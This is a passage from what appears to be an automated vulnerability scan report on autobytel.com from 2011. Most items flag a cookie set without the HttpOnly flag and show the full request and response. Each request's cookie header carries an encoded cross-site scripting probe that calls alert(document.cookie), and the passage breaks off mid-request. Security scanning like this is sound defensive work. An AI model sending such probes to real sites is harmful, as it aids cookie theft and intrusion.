HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:23:56 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:23:56 GMT
Connection: close
Content-Type: text/html
Content-Length: 65145

<!-- dstolweb10-php5b --><!DOCTYPE html>
<html>
<head>
   <title>ATVs for Sale - Bombardier, Polaris, Can-Am, Arctic Cat - ATV Trader.com</title>
   <meta http-equiv="Cache-Control" content="no-cache" />

...[SNIP]...

14.618. http://www.autobytel.com/auto-insurance-quotes.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33642


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.619. http://www.autobytel.com/car-advice.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43756
Expires: Mon, 24 Jan 2011 23:47:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:47 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:46 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.620. http://www.autobytel.com/car-blog.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:00 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62043


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.621. http://www.autobytel.com/car-dealers.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38815


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.622. http://www.autobytel.com/car-financing.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:55 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41426


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.623. http://www.autobytel.com/car-incentives.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.624. http://www.autobytel.com/car-news.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 40861
Expires: Mon, 24 Jan 2011 23:47:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:58 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:58 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.625. http://www.autobytel.com/car-pictures.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:32 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43538


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.626. http://www.autobytel.com/car-reviews.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:46:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:46:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:46:10 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49202


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.627. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 35797
Expires: Mon, 24 Jan 2011 23:28:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:28:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...

14.628. http://www.autobytel.com/content/buy/warranty/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39485


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.629. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.630. http://www.autobytel.com/content/home/help/index.cfm/action/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
